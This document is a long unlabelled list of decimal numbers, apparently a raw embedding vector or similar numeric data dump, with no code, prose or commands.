-0.0426689013838768, 0.00556105887517333, 0.016451939940452576, 0.03147855028510094, -0.014389760792255402, -0.014837071299552917, -0.010743040591478348, -0.008081920444965363, -0.0027691570576280355, -0.017088789492845535, -0.04275988042354584, -0.014935631304979324, 0.02045499160885811, 0.01147086825221777, -0.00783172994852066, 0.007361674215644598, -0.07132712006568909, -0.01462478842586279, -0.016269981861114502, 0.02415478229522705, -0.024291250854730606, -0.009537575766444206, -0.02570141665637493, -0.023335976526141167, 0.025610437616705894, 0.0013665723381564021, -0.009537575766444206, -0.011516357772052288, 0.0062168617732822895, 0.017316235229372978, -0.017134277150034904, -0.024579349905252457, 0.00010027769894804806, -0.030917515978217125, 0.006887827999889851, -0.01521614845842123, 0.0004082184750586748, 0.012282093055546284, 0.005060677416622639, -0.05310109630227089, 0.005849157460033894, 0.023381466045975685, 0.0028108556289225817, 0.008370018564164639, 0.005208517424762249, 0.020576296374201775, 0.013222203589975834, -0.01912064105272293, -0.012812800705432892, 0.002877193968743086, 0.022138092666864395, -0.04861282557249069, 0.0639275386929512, 0.03927237167954445, -0.01854444481432438, -0.016376124694943428, -0.011493613012135029, -0.017483029514551163, 0.030841700732707977, 0.01331318262964487, -0.0003489876980893314, 0.06295710057020187, -0.03566356003284454, -0.03605780005455017, -0.04012150317430496, 0.03766508400440216, -0.01604253612458706, 0.022486845031380653, -0.002805169438943267, -0.037786390632390976, -0.017755964770913124, 0.02982577309012413, -0.020485317334532738, -0.025595275685191154, -0.008984123356640339, 0.0025947815738618374, -0.01755884476006031, 0.0027691570576280355, 0.012213858775794506, -0.03678562492132187, 0.013123643584549427, -0.009522412903606892, -0.0034192739985883236, 0.012736985459923744, -0.035269320011138916, -0.017179766669869423, -0.04521629959344864, -0.03320714086294174, 0.022107766941189766, 0.026914462447166443, 0.01980298012495041, -0.000331692339386791, -0.023775706067681313, 0.049128372222185135, -0.01253986544907093, 0.031175287440419197, 0.0036922094877809286, 0.03927237167954445, 0.021486081182956696, 0.029052456840872765, 0.011880271136760712, 0.0010500431526452303, 0.03354072943329811, 0.012304837815463543, 0.03072039596736431, 0.012843126431107521, -0.022077441215515137, 0.010219914838671684, -0.023366302251815796, -0.008089502342045307, -0.026762831956148148, 0.011258585378527641, -0.014958376064896584, -0.0018167262896895409, 0.03681595250964165, -0.0190903153270483, 0.02601984143257141, -0.03611845150589943, -0.04233531281352043, 0.007634609472006559, -0.009355618618428707, 0.003919655457139015, 0.0038969109300523996, -0.005716480314731598, 0.023927336558699608, -0.011379890143871307, 0.03396529331803322, 0.034966059029102325, -0.02227456122636795, -0.0308113731443882, 0.005614129360765219, -0.01951488107442856, 0.017164604738354683, 0.017786290496587753, -0.019014500081539154, -0.025003915652632713, 0.03426855430006981, -0.009643717668950558, 0.016103189438581467, -0.01628514565527439, -0.014321526512503624, -0.027414845302700996, 0.02821848727762699, -0.05998513475060463, -0.006732406560331583, -0.030887188389897346, -0.003614498535171151, -0.024033477529883385, -0.0452769510447979, -0.008984123356640339, -0.013677095994353294, 0.024715816602110863, -0.01114486251026392, 0.0250948928296566, 0.030341317877173424, -0.007437489461153746, 0.029295066371560097, -0.0012376862578094006, -0.017725637182593346, 0.006618683226406574, -0.047612063586711884, -0.019939446821808815, -0.024867447093129158, 0.01881738007068634, -0.04009117931127548, 0.016179004684090614, 0.049067720770835876, -0.023654401302337646, 0.006023532710969448, -0.037483129650354385, 0.025595275685191154, -0.026777995750308037, -0.0024848494213074446, -0.01816536672413349, 0.008915890008211136, 0.023351140320301056, 0.017725637182593346, 0.05440512299537659, 0.009620972909033298, -0.0055875941179692745, -0.0030875816009938717, 0.03884780406951904, -0.03417757898569107, -0.00016904462245292962, -0.008877982385456562, 0.041941072791814804, -0.027536148205399513, -0.04494336247444153, -0.01288103498518467, 0.006812012754380703, 0.024897772818803787, -0.03899943456053734, 0.03448083996772766, 0.03105398267507553, -0.009787766262888908, 0.005906018894165754, -0.007657354231923819, -0.0539502315223217, -0.05240359529852867, 0.022486845031380653, -0.007661145180463791, 0.00770284328609705, 0.03241866081953049, 0.012433723546564579, -0.01601221039891243, 0.02350277081131935, -0.03193344175815582, -0.009196406230330467, -0.031023656949400902, 0.019984936341643333, -0.010432197712361813, 0.0005349723505787551, 0.007509514223784208, 0.030826536938548088, 0.00010104769899044186, 0.010864345356822014, -0.0029738587327301502, -0.02192581072449684, 0.010796111077070236, 0.005837785080075264, -0.040000200271606445, 0.005735434126108885, -0.01507968083024025, 0.018119877204298973, -0.001094584702514112, -0.0036580925807356834, 0.010235077701508999, -0.030568765476346016, -0.038150303065776825, 0.019954610615968704, -0.03302518278360367, -0.01695232093334198, -0.05589110404253006, 0.02921925112605095, 0.014245711266994476, -0.004048541653901339, -0.017210092395544052, -0.0008472369518131018, -0.027748432010412216, -0.04488271102309227, -0.025307176634669304, 0.015769600868225098, -0.001445230795070529, -0.042547594755887985, 0.016785526648163795, -0.01539810560643673, -0.01815020479261875, 0.014928050339221954, 0.02136477641761303, 0.01034880056977272, -0.024078967049717903, 0.007028086576610804, -0.017392050474882126, 0.02391217276453972, -0.0035917540080845356, 0.018680911511182785, 0.024533860385417938, 0.00643293559551239, 0.06865841895341873, -0.040667373687028885, -0.07047798484563828, -0.016224492341279984, 0.007357883267104626, -0.0030231387354433537, -0.012532283551990986, -0.01948455534875393, 0.003722535679116845, 0.018620260059833527, -0.0036296616308391094, 0.03460214287042618, 0.0011514462530612946, -0.0250948928296566, 0.004442781675606966, -0.02319950982928276, -0.0017617600969970226, -0.023972826078534126, -0.020166892558336258, -0.008809748105704784, 0.012517120689153671, 0.014662696048617363, -0.032843224704265594, -0.03605780005455017, -0.015481502749025822, -0.0009960246970877051, -0.0066414279863238335, -0.031144961714744568, -0.012714240700006485, -0.008279040455818176, 0.01567862182855606, -0.019302597269415855, 0.03478410094976425, -0.02388184703886509, 0.0030060801655054092, -0.017664985731244087, -0.0024658956099301577, -0.024594511836767197, 0.017649821937084198, -0.02790006250143051, 0.008210806176066399, -0.00877184048295021, -0.02451869659125805, 0.0007619446841999888, -0.02570141665637493, 0.02982577309012413, 0.021486081182956696, 0.0062964679673314095, -0.012016738764941692, 0.056042734533548355, -0.0022763570304960012, 0.0027369356248527765, 0.016436776146292686, 0.0009827569592744112, 0.04090998321771622, 0.020970536395907402, -0.004173637367784977, -0.005511778872460127, -0.003315027803182602, -0.0014272247208282351, -0.010652062483131886, -0.032479312270879745, -0.025625601410865784, -0.018271509557962418, -0.014935631304979324, 0.019272271543741226, -0.010197170078754425, 0.019014500081539154, 0.0014319631736725569, 0.03724052011966705, 0.0028089601546525955, -0.02319950982928276, 0.0036182894837111235, 0.012790055945515633, -0.011053883470594883, -0.003070523263886571, 0.025974351912736893, -0.00278621562756598, 0.009856000542640686, -0.012903778813779354, -0.010462523438036442, -0.007945452816784382, -0.015345034189522266, -0.008362437598407269, -0.0011021662503480911, -0.004340431187301874, -0.02163771167397499, 0.028006205335259438, 0.01414715126156807, 0.006311631295830011, 0.01195608638226986, 0.005754387937486172, 0.001916233915835619, -0.005208517424762249, 0.033267792314291, 0.0015267323469743133, -0.033449750393629074, -0.03830193355679512, 0.01096290536224842, 0.03633073344826698, 0.004874929320067167, -0.050705332309007645, 0.02451869659125805, -0.01628514565527439, 0.02667185291647911, 0.07205494493246078, 0.0017314339056611061, 0.011872690171003342, 0.00032316308352164924, -0.004514806438237429, 0.00027506769401952624, -0.00502656027674675, 0.024685490876436234, 0.015511828474700451, -0.01784694194793701, 0.011698314920067787, -0.021486081182956696, -0.0029359508771449327, 0.013722585514187813, 0.0050417231395840645, -0.023987989872694016, -0.015572480857372284, 0.00422291737049818, -0.005314658861607313, 0.032479312270879745, -0.014617206528782845, -0.03299485892057419, -0.01972716487944126, 0.009742277674376965, 0.02955283783376217, 0.006425354164093733, -0.02574690617620945, 0.012494375929236412, -0.02542848140001297, -0.008703606203198433, -0.011660406365990639, 0.022441355511546135, -0.017407212406396866, 0.009499668143689632, -0.003396529471501708, 0.03423823043704033, -0.0178621057420969, 0.027505822479724884, -0.011182770133018494, 0.0053222402930259705, -0.009484505280852318, 0.01363918837159872, 0.013358671218156815, -0.013062991201877594, 0.011880271136760712, -0.02194097265601158, -0.028370117768645287, -0.015269218944013119, -0.029598327353596687, -0.025064567103981972, -0.0017475447384640574, -0.03387431427836418, 0.000022167116185300983, 0.020000100135803223, -0.012388234958052635, -0.019075151532888412, -0.00525400647893548, 0.018771890550851822, -0.01630030944943428, -0.010470105335116386, 0.0345718190073967, -0.0013457231689244509, -0.000988443149253726, 0.010788530111312866, -0.001857477007433772, -0.026004677638411522, -0.008862818591296673, -0.029704468324780464, 0.0005392369348555803, -0.004601994063705206, -0.025049405172467232, -0.011000812985002995, 0.0044124554842710495, -0.0009443754097446799, -0.017361724749207497, 0.0037490709219127893, -0.022486845031380653, -0.024412555620074272, 0.01690683141350746, 0.00006050423326087184, -0.022047115489840508, 0.027520986273884773, -0.04075835272669792, -0.0002556400140747428, -0.0016755200922489166, -0.0008567139157094061, -0.0013182400725781918, -0.0514938123524189, -0.03235800936818123, 0.018984172493219376, 0.015906069427728653, -0.040060851722955704, -0.0077559142373502254, 0.0009837046964094043, 0.0016167631838470697, -0.009423852898180485, -0.021152492612600327, -0.021167656406760216, 0.005716480314731598, 0.014928050339221954, 0.0006482215831056237, 0.011903015896677971, -0.018316997215151787, -0.01628514565527439, -0.006467052735388279, -0.006656591314822435, -0.029901588335633278, -0.017498191446065903, -0.003931027837097645, -0.011910597793757915, 0.028506586328148842, -0.01382114551961422, -0.019924284890294075, -0.027384517714381218, 0.012994757853448391, -0.0021342032123357058, -0.0030553601682186127, 0.009856000542640686, -0.02727837674319744, -0.020909884944558144, 0.009613391011953354, 0.014018265530467033, -0.001227261614985764, 0.0013343507889658213, 0.007960615679621696, 0.0008178584976121783, 0.03332844376564026, -0.0008780369535088539, 0.0002971015637740493, -0.0025360246654599905, 0.006959852762520313, 0.004969698842614889, -0.02450353279709816, -0.02418510988354683, -0.012471631169319153, 0.01240339782088995, -0.026838647201657295, -0.02103118970990181, -0.012122880667448044, 0.014533810317516327, 0.026535386219620705, -0.026808321475982666, -0.04248694330453873, 0.013677095994353294, 0.034996382892131805, -0.013381415978074074, -0.0169978104531765, -0.009385945275425911, 0.0032847016118466854, 0.015951557084918022, 0.006546658929437399, -0.018104715272784233, 0.002958695637062192, -0.002029957016929984, -0.025322340428829193, 0.017968246713280678, 0.020636949688196182, 0.003136861603707075, -0.021774180233478546, 0.004859766457229853, -0.03199409320950508, -0.013199458830058575, 0.024382229894399643, 0.023942500352859497, 0.010811274871230125, 0.009802930057048798, -0.00895379763096571, -0.0012642216170206666, -0.015875741839408875, 0.022699126973748207, -0.014829490333795547, 0.05404121056199074, 0.02045499160885811, -0.013517883606255054, 0.028703706339001656, 0.02201678976416588, 0.011341982521116734, -0.00013232154014986008, -0.0007145600393414497, -0.03260061889886856, 0.007202461827546358, -0.019044825807213783, 0.004423827864229679, -0.000693236943334341, 0.01815020479261875, -0.007373046595603228, -0.006542867980897427, 0.0003534892457537353, 0.03426855430006981, 0.015337453223764896, -0.00736546516418457, -0.008460997603833675, -0.020500481128692627, 0.001485033892095089, -0.04048541933298111, -0.01099323108792305, -0.04921935126185417, 0.04321477189660072, 0.010303311049938202, -0.012767311185598373, 0.006853711325675249, 0.0112813301384449, 0.005348775535821915, -0.009226732887327671, 0.01946939155459404, -0.03648236393928528, -0.012031902559101582, 0.01288861595094204, -0.02263847552239895, 0.018680911511182785, 0.02946186065673828, 0.0026573294308036566, -0.006645218934863806, -0.0407886803150177, 0.013161551207304, 0.01225176639854908, 0.007520886603742838, 0.021728690713644028, 0.018635421991348267, 0.023169182240962982, -0.029765121638774872, -0.013062991201877594, -0.0023237415589392185, 0.015784764662384987, -0.004704345017671585, 0.007721797097474337, -0.01910547725856304, 0.044124554842710495, -0.022517170757055283, -0.014025846496224403, 0.006087975576519966, -0.032843224704265594, -0.031266264617443085, 0.005936345085501671, 0.012752148322761059, -0.019044825807213783, -0.0033131325617432594, 0.001974990824237466, -0.012456468306481838, 0.014639951288700104, 0.011993994936347008, 0.002977649448439479, -0.01730107143521309, 0.005477661732584238, -0.004890092648565769, -0.006584566552191973, -0.0007041353965178132, -0.010917415842413902, 0.0013779447181150317, 0.009901490062475204, -0.053859252482652664, -0.0069674341939389706, -0.006262351293116808, 0.007156972773373127, -0.022714290767908096, -0.024973589926958084, -0.003258166369050741, -0.007824148051440716, -0.03305551037192345, -0.04588347300887108, -0.03363170474767685, -0.005113747902214527, 0.007236578967422247, -0.025064567103981972, -0.01981814205646515, -0.002295310841873288, -0.0060121603310108185, -0.012911360710859299, 0.00254739704541862, -0.00340979709289968, -0.03802900016307831, 0.022213909775018692, -0.010151680558919907, -0.016770364716649055, -0.02541331760585308, -0.014928050339221954, 0.011614917777478695, 0.006975015625357628, 0.019226782023906708, 0.010197170078754425, -0.03454149141907692, 0.0009609600529074669, 0.00239955703727901, 0.0242305975407362, 0.000023766348022036254, -0.026550548151135445, 0.01457929890602827, -0.01943906582891941, -0.010265403427183628, -0.010091028176248074, 0.01555731799453497, -0.016542917117476463, 0.02107667736709118, -0.031812138855457306, 0.0015873847296461463, 0.02796071581542492, -0.01489772368222475, -0.014238130301237106, 0.000540658482350409, 0.007179717067629099, 0.0008704554056748748, -0.0024488370399922132, -0.02077341638505459, -0.01602737233042717, -0.028779521584510803, -0.013381415978074074, 0.010242658667266369, 0.06195633485913277, -0.016755200922489166, -0.023487607017159462, 0.008809748105704784, 0.020333686843514442, 0.013138806447386742, -0.01855960674583912, 0.005780923180282116, -0.01980298012495041, 0.02074309065937996, -0.008104665204882622, -0.0013447754317894578, -0.017103951424360275, -0.004662646446377039, 0.0002311184798600152, -0.017210092395544052, -0.0007538892677985132, 0.030902352184057236, -0.046944890171289444, -0.024048641324043274, -0.030280666425824165, -0.029734795913100243, 0.0009590646368451416, 0.01573927514255047, -0.01128891110420227, 0.005284332670271397, 0.03135724365711212, -0.02233521267771721, 0.03933302313089371, -0.04245661944150925, -0.023396629840135574, -0.029765121638774872, 0.0005581908044405282, -0.0159818846732378, -0.03402594476938248, -0.025276850908994675, 0.0032486894633620977, -0.019241945818066597, 0.008127409964799881, 0.01112211775034666, 0.026125982403755188, 0.03605780005455017, -0.0048370216973125935, -0.03046262264251709, -0.011895434930920601, -0.024351902306079865, -0.011023557744920254, 0.009689206257462502, 0.010174425318837166, 0.02136477641761303, -0.015633132308721542, -0.03387431427836418, -0.03272192180156708, 0.01915096677839756, 0.007505723275244236, 0.023927336558699608, 0.029082782566547394, -0.029355717822909355, -0.013328345492482185, -0.008938634768128395, -0.018392812460660934, 0.007240369450300932, -0.01784694194793701, 0.022714290767908096, -0.021561896428465843, -0.021197982132434845, -0.0010424616048112512, -0.011963668279349804, 0.00956790242344141, 0.021819669753313065, -0.008991705253720284, 0.01855960674583912, -0.0016328739002346992, 0.014981120824813843, -0.034996382892131805, 0.03636106103658676, -0.008362437598407269, 0.011993994936347008, 0.005655827932059765, -0.007031877059489489, -0.027430007234215736, -0.022729452699422836, -0.013692258857190609, -0.03957563266158104, 0.006872665137052536, 0.04042476415634155, 0.007899963296949863, -0.016755200922489166, 0.011061465367674828, -0.010151680558919907, 0.010871926322579384, -0.03954530507326126, -0.007081157062202692, -0.013267693109810352, -0.02539815567433834, 0.005955298896878958, 0.020000100135803223, -0.009787766262888908, -0.015451176092028618, -0.0017939816461876035, 0.022350376471877098, 0.0013106585247442126, 0.009158498607575893, -0.013229785487055779, 0.007479188032448292, 0.010295730084180832, 0.026429245248436928, -0.014473157934844494, 0.0015940185403451324, 0.00720625277608633, 0.020606622099876404, 0.0032126770820468664, -0.004727089311927557, -0.0178621057420969, 0.019363250583410263, -0.01524647418409586, -0.011933342553675175, -0.0026933415792882442, -0.036603670567274094, -0.019211620092391968, 0.012615680694580078, 0.03378333896398544, 0.017088789492845535, -0.02981061115860939, -0.012130462564527988, -0.019241945818066597, 0.0033870525658130646, -0.006197907961905003, -0.00005407769640441984, 0.00911301001906395, 0.014131988398730755, 0.0005226523499004543, -0.004109194036573172, 0.06501927971839905, -0.02166803739964962, -0.020940210670232773, 0.008877982385456562, -0.011258585378527641, -0.01572411134839058, 0.021410265937447548, 0.004567877389490604, -0.010303311049938202, -0.026429245248436928, 0.030826536938548088, 0.014526228420436382, -0.015413268469274044, -0.006224443204700947, -0.0026042587123811245, 0.04027313366532326, -0.013722585514187813, 0.019348086789250374, 0.0026345846708863974, 0.019696837291121483, -0.0020602832082659006, -0.017634660005569458, 0.007725588046014309, 0.02420027181506157, -0.011417797766625881, -0.019696837291121483, -0.0008515015942975879, 0.009560320526361465, 0.02887050062417984, -0.03076588548719883, -0.003083790885284543, -0.029901588335633278, -0.03396529331803322, 0.011273748241364956, 0.014829490333795547, -0.0024488370399922132, 0.000706504681147635, -0.010394290089607239, -0.020606622099876404, 0.006232025101780891, 0.018028900027275085, 0.004090240225195885, -0.004670227877795696, -0.009620972909033298, 0.02608049288392067, 0.052282292395830154, 0.012183533050119877, -0.034693121910095215, -0.009643717668950558, 0.0012158893514424562, -0.011273748241364956, -0.009939397685229778, -0.004605785012245178, 0.012069810181856155, 0.017710475251078606, 0.008536812849342823, 0.00802126806229353, 0.005606547929346561, 0.020652111619710922, 0.020030425861477852, -0.0047536250203847885, -0.012896197848021984, 0.014806745573878288, -0.006224443204700947, 0.013434486463665962, -0.0049772802740335464, 0.001154289348050952, 0.028051692992448807, -0.0034514956641942263, 0.0108491824939847, -0.02043982967734337, 0.03132691979408264, -0.0008008000440895557, -0.014958376064896584, -0.011796874925494194, 0.012009157799184322, -0.04606543108820915, 0.0010453046998009086, 0.020515644922852516, 0.005007606465369463, 0.0244428813457489, 0.02069760113954544, 0.005269169341772795, -0.0033207139931619167, 0.004139520227909088, -0.003362412564456463, 0.01130407489836216, 0.006069021765142679, -0.02855207584798336, 0.0013552000746130943, -0.02194097265601158, 0.03802900016307831, -0.01288861595094204, -0.0011590278008952737, -0.03633073344826698, -0.019363250583410263, -0.00005090884951641783, 0.010091028176248074, 0.03040197119116783, 0.004287360236048698, 0.008332110941410065, -0.00012296308705117553, -0.024943262338638306, -0.003428750904276967, -0.026247287169098854, 0.006300258915871382, 0.011865108273923397, 0.002566350856795907, 0.007551212795078754, 0.00399547116830945, -0.029097946360707283, 0.0026497477665543556, 0.027520986273884773, 0.01724041998386383, 0.01489014271646738, -0.0019465601071715355, -0.02541331760585308, 0.006732406560331583, 0.0023976615630090237, -0.016179004684090614, 0.024594511836767197, -0.01849895529448986, -0.010978068225085735, 0.009696788154542446, -0.0038419447373598814, -0.0018603201024234295, -0.003468554001301527, -0.019939446821808815, 0.028142672032117844, 0.00027198769384995103, -0.0013163447147235274, 0.008097083307802677, -0.01068997010588646, 0.004037169273942709, -0.00045441847760230303, -0.0017409108113497496, 0.02859756536781788, 0.015314708463847637, 0.0038419447373598814, 0.010796111077070236, 0.0013011816190555692, 0.003680837107822299, -0.020652111619710922, -0.002956800162792206, -0.023684727028012276, 0.008627790957689285, 0.01332076359540224, 0.028354955837130547, 0.004537551198154688, 0.0005998892593197525, 0.0326915942132473, -0.0026952370535582304, 0.013335926458239555, 0.02039434015750885, -0.008279040455818176, -0.03305551037192345, -0.005996997468173504, 0.025261687114834785, -0.03041713312268257, 0.017452701926231384, -0.014207803644239902, 0.01701297238469124, 0.016224492341279984, 0.013108480721712112, -0.016148677095770836, -0.009294966235756874, -0.02171352691948414, -0.005223680287599564, -0.0007140861707739532, -0.027748432010412216, -0.0112813301384449, -0.011872690171003342, 0.0033131325617432594, 0.012972013093531132, 0.017452701926231384, 0.016512591391801834, 0.03199409320950508, 0.010197170078754425, 0.00644430797547102, 0.012471631169319153, -0.007748332805931568, 0.035329971462488174, 0.0005193353863433003, 0.018953846767544746, -0.00989390816539526, -0.008392763324081898, 0.0351480133831501, -0.003678941633552313, -0.0043290588073432446, 0.02445804513990879, -0.016118351370096207, 0.009878745302557945, 0.013116062618792057, -0.005970461759716272, 0.029734795913100243, -0.02982577309012413, -0.01972716487944126, 0.012532283551990986, -0.0015940185403451324, 0.02324499748647213, -0.009931815788149834, 0.002255507744848728, -0.02638375572860241, -0.02291141077876091, 0.00486734788864851, -0.0013570954324677587, 0.016179004684090614, 0.014450413174927235, 0.0066414279863238335, 0.0012395816156640649, -0.012441305443644524, 0.00675136037170887, -0.06410948932170868, -0.015633132308721542, 0.0038571078330278397, -0.0006406400352716446, 0.013442068360745907, -0.0012244185199961066, 0.0065618217922747135, 0.006262351293116808, 0.0038646894972771406, -0.008984123356640339, -0.03363170474767685, 0.01784694194793701, -0.007240369450300932, -0.020485317334532738, 0.0020204801112413406, -0.007645981851965189, 0.014518646523356438, 0.009363200515508652, -0.0058074588887393475, -0.022835595533251762, -0.010417034849524498, -0.015784764662384987, 0.006937108002603054, 0.010280566290020943, 0.03351040184497833, -0.004344221670180559, -0.00959822814911604, -0.01336625311523676, 0.0012424247106537223, 0.006239606533199549, 0.009044775739312172, 0.00660352036356926, 0.010091028176248074, -0.015254056081175804, 0.009325292892754078, -0.002283938694745302, 0.01144812349230051, 0.00004771038584294729, -0.016118351370096207, 0.004495852626860142, -0.0013428800739347935, 0.006470843218266964, 0.004192591179162264, 0.003931027837097645, 0.013904542662203312, -0.0019598277285695076, 0.020242709666490555, -0.014548973180353642, 0.00956790242344141, 0.006857501808553934, -0.012486794963479042, -0.007968197576701641, 0.010333637706935406, 0.003203200176358223, -0.006144837476313114, -0.017786290496587753, -0.009317710995674133, -0.01755884476006031, -0.024033477529883385, 0.03448083996772766, 0.027066092938184738, 0.022077441215515137, 0.01398035790771246, -0.0016091816360130906, -0.012198695912957191, 0.015026610344648361, -0.003032615641131997, 0.013388997875154018, 0.008172898553311825, 0.01034880056977272, -0.015572480857372284, 0.0023919756058603525, -0.025655927136540413, 0.012001575902104378, 0.00044115079799667, 0.02664152719080448, 0.010197170078754425, -0.005746806506067514, -0.00021702154481317848, -0.003646720200777054, 0.013487557880580425, 0.000739673909265548, 0.006728615611791611, 0.01727074570953846, 0.0017721847398206592, 0.008847655728459358, -0.014003102667629719, -0.01690683141350746, 0.008377600461244583, 0.002858240157365799, -0.005769551265984774, 0.00635332940146327, -0.021728690713644028, 0.031144961714744568, -0.015860579907894135, -0.02514038234949112, 0.0016139200888574123, -0.025322340428829193, 0.029947077855467796, -0.0041243573650717735, 0.01855960674583912, -0.02641408145427704, 0.0007704739109613001, -0.010841600596904755, 0.010136517696082592, 0.02382119558751583, -0.0016546708066016436, -0.004636111203581095, 0.0009576431475579739, -0.007968197576701641, -0.01792275719344616, -0.014086498878896236, 0.007354092784225941, 0.005212307907640934, 0.003758547827601433, -0.010037957690656185, -0.008028849959373474, -0.04139520227909088, -0.00278621562756598, -0.0026687015779316425, 0.01886286959052086, 0.004764997400343418, 0.02382119558751583, 0.0002351461589569226, 0.021577060222625732, 0.021728690713644028, 0.007649772800505161, 0.003641034010797739, 0.03414725139737129, -0.010204751044511795, 0.05613371357321739, -0.013768074102699757, -0.008787003345787525, 0.008605046197772026, 0.006413981784135103, 0.005883274134248495, 0.022805269807577133, 0.005826412700116634, 0.019075151532888412, 0.01789243146777153, -0.009378363378345966, 0.009128172881901264, 0.010159262455999851, 0.016497429460287094, -0.028627891093492508, -0.023654401302337646, 0.007183508016169071, 0.01634579710662365, 0.0053828926756978035, 0.006360911298543215, -0.0030060801655054092, -0.010227495804429054, -0.01660357043147087, 0.0006387446774169803, -0.002380603225901723, -0.023290487006306648, -0.011069046333432198, -0.002752098720520735, -0.0022536125034093857, 0.01521614845842123, 0.01755884476006031, -0.02232005074620247, 0.007448861841112375, 0.014260874129831791, -0.014693022705614567, 0.013859053142368793, -0.011319237761199474, -0.01100839488208294, 0.0025568739511072636, -0.021273797377943993, 0.03648236393928528, -0.03378333896398544, -0.011637662537395954, 0.0015182031784206629, -0.015473920851945877, -0.008195643313229084, 0.014837071299552917, -0.0053866831585764885, -0.009749858640134335, 0.002744517056271434, 0.003129280172288418, -0.0004880615742877126, -0.022350376471877098, -0.013176714070141315, 0.01815020479261875, 0.013404160737991333, 0.017058461904525757, -0.00534498505294323, -0.008726350963115692, 0.020803742110729218, 0.00010335769911762327, 0.020879557356238365, -0.019226782023906708, -0.010182006284594536, 0.02007591538131237, -0.019954610615968704, -0.003368098521605134, -0.032509639859199524, 0.024109292775392532, -0.014677858911454678, -0.023138856515288353, -0.012797637842595577, 0.002585304668173194, -0.007338929455727339, 0.023927336558699608, -0.011251003481447697, -0.005432172678411007, 0.00659214798361063, 0.012259348295629025, 0.02955283783376217, -0.017119115218520164, -0.009674043394625187, 0.04054607078433037, 0.020288197323679924, 0.007403372786939144, 0.024928100407123566, -0.00943143479526043, -0.003972726408392191, 0.00924947764724493, -0.004374547861516476, -0.0014622893650084734, 0.015845416113734245, 0.014988702721893787, 0.020015262067317963, 0.0012130462564527988, 0.012911360710859299, 0.01053833868354559, 0.013608862645924091, 0.006103138905018568, -0.015087262727320194, -0.013760493136942387, -0.015276800841093063, 0.0036505109164863825, -0.006031114142388105, 0.000995076959952712, -0.014935631304979324, 0.009075102396309376, 0.021546732634305954, -0.01849895529448986, 0.005936345085501671, -0.004681600257754326, 0.021865157410502434, -0.030963005498051643, 0.01846862956881523, 0.02984093688428402, -0.008423089981079102, 0.013442068360745907, 0.004366966430097818, -0.013108480721712112, -0.002858240157365799, -0.012130462564527988, -0.013260111212730408, 0.015390523709356785, -0.007103901822119951, 0.00456029549241066, -0.02788490056991577, -0.028354955837130547, 0.005943926516920328, 0.0006614892627112567, 0.029279902577400208, -0.031205613166093826, -0.011872690171003342, 0.03366203233599663, -0.012160788290202618, 0.028749195858836174, 0.014427668415009975, 0.001267064712010324, 0.0043328492902219296, -0.024382229894399643, -0.0028696125373244286, 0.012312418781220913, 0.013351090252399445, 0.00691057275980711, -0.02134961262345314, -0.0015437908004969358, -0.00954515766352415, -0.004928000271320343, 0.016118351370096207, -0.015633132308721542, 0.007467815652489662, 0.014351853169500828, 0.0031539201736450195, -0.011213095858693123, 0.01240339782088995, 0.00668312655761838, -0.007585329469293356, -0.00605764938518405, 0.00877184048295021, 0.007975778542459011, 0.002898043254390359, 0.008006105199456215, -0.0139576131477952, -0.001445230795070529, 0.021592222154140472, -0.0006629108102060854, 0.012509538792073727, -0.002805169438943267, 0.004177427850663662, 0.021137330681085587, 0.006232025101780891, -0.02915859781205654, -0.003337772563099861, -0.006232025101780891, 0.0006652800366282463, -0.010197170078754425, -0.004317686427384615, -0.028976641595363617, 0.0034439139999449253, -0.0015826462768018246, -0.005056886468082666, -0.014912886545062065, 0.00728585897013545, -0.0010320369619876146, -0.011000812985002995, 0.012979594990611076, 0.007627028040587902, 0.0015200985362753272, -0.016497429460287094, 0.04354836046695709, 0.006755151320248842, 0.023335976526141167, -0.015132751315832138, 0.01912064105272293, -0.007721797097474337, 0.006395027972757816, -0.008112246170639992, 0.029446696862578392, 0.012441305443644524, 0.025337502360343933, 0.014723348431289196, 0.01724041998386383, 0.011190351098775864, -0.01910547725856304, 0.0017873478354886174, 0.005246425047516823, 0.009772603400051594, 0.01975749060511589, -0.005489034112542868, -0.008370018564164639, -0.02043982967734337, -0.0058112493716180325, 0.026216961443424225, -0.003949981648474932, 0.019621022045612335, -0.002481058705598116, 0.010545920580625534, 0.019393576309084892, -0.005458707921206951, -0.006686917040497065, -0.013912123627960682, -0.008059175685048103, -0.018574770539999008, 0.008271458558738232, 0.008749095723032951, -0.00243936013430357, 0.01505693607032299, -0.010712714865803719, 0.013578535988926888, -0.004105403088033199, -0.006686917040497065, -0.003057255642488599, 0.014382178895175457, -0.007630818989127874, 0.017103951424360275, 0.000011979424016317353, -0.0002658276935108006, -0.026762831956148148, 0.016133515164256096, 0.005356357432901859, -0.01398035790771246, -0.010265403427183628, -0.0007377784932032228, -0.0009780185064300895, -0.002149366308003664, -0.018893195316195488, -0.0011846154229715466, -0.002890461590141058, -0.000015725770936114714, -0.025959189981222153, -0.0026705970522016287, -0.022699126973748207, 0.00016525384853594005, 0.00975744053721428, -0.02577723190188408, -0.01523889321833849, 0.009924234822392464, -0.006474634166806936, 0.004507225006818771, 0.024351902306079865, -0.017149440944194794, 0.01194850541651249, -0.03108430840075016, -0.00036130769876763225, 0.008460997603833675, 0.012054646387696266, 0.007426117081195116, 0.013472394086420536, -0.012577773071825504, -0.012774893082678318, -0.0007771077216602862, -0.00705841276794672, -0.008877982385456562, 0.006849920377135277, -0.024351902306079865, 0.01661873236298561, -0.031008493155241013, -0.0008282831404358149, -0.012047065421938896, 0.0037263263948261738, -0.011251003481447697, 0.002168320119380951, 0.03103882074356079, 0.004139520227909088, 0.013085735961794853, -0.015094843693077564, 0.015526991337537766, -0.007706634234637022, -0.010280566290020943, -0.016179004684090614, 0.008582302369177341, 0.009620972909033298, -0.006940898951143026, -0.0005629292572848499, 0.023487607017159462, 0.014154733158648014, -0.004764997400343418, -0.0014101662673056126, -0.012168370187282562, 0.004450363107025623, 0.010326055809855461, 0.011167606338858604, 0.006546658929437399, -0.0017484923591837287, -0.008218388073146343, 0.013032665476202965, 0.011910597793757915, -0.016785526648163795, -0.01428361888974905, 0.037847042083740234, 0.012532283551990986, -0.00025469233514741063, -0.010932578705251217, 0.008294203318655491, -0.0021379939280450344, -0.019939446821808815, 0.00895379763096571, -0.01790759526193142, 0.010492850095033646, 0.013161551207304, 0.03633073344826698, 0.01848379150032997, -0.008650535717606544, 0.00035822769859805703, -0.0025417108554393053, 0.018362486734986305, -0.0008548184996470809, 0.021531570702791214, -0.007691471371799707, 0.01755884476006031, 0.022198745980858803, 0.01427603792399168, 0.02103118970990181, -0.01320704072713852, 0.008279040455818176, 